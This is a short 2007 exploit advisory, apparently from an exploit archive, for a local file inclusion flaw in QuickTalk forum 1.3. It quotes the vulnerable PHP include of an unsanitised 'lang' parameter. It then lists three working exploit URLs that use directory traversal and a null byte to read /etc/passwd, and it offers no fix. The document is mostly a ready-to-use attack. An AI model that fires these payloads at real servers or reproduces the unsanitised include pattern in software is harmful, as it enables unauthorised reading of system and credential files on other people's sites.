QuickTalk forum 1.3 (lang) Local File Inclusion Vulnerabilities

2007-06-27 00:00:00

###QuickTalk forum v1.3 Local File Inclusion###

#download: http://www.qt-cute.org/download/qtf13.zip

#found by: katatafish ([email protected])

#vulncode:
$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");

#exploits:

http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00

#thanks:str0ke

#

Fixes

No fixes

In order to submit a new fix you need to be registered.